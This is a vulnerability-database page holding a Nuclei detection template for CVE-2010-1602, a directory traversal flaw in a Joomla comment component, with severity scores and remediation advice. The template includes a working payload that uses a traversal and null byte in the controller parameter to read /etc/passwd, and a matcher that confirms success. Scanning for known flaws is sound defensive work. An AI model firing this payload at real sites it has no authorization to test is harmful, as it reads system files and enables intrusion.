Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1602
HistoryAug 14, 2021 - 11:25 p.m.

Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion

2021-08-1423:25:02
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

Low

0.035 Low

EPSS

Percentile

91.6%

A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1602

info:
  name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12283
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1602
    - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt
    - http://www.vupen.com/english/advisories/2010/0932
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1602
    cwe-id: CWE-22
    epss-score: 0.03451
    epss-percentile: 0.91491
    cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zimbllc
    product: com_zimbcomment
  tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a0eeca7aba4d9618dbe8ca061a7589c36f2b6768e904f2b92e36691632e3cc0a022100bcb42d40cbb3d6a870475dd714f9ca84ad666d622dac96e9707a9253f85c0183:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

6.7 Medium

AI Score

Confidence

Low

0.035 Low

EPSS

Percentile

91.6%

Related for NUCLEI:CVE-2010-1602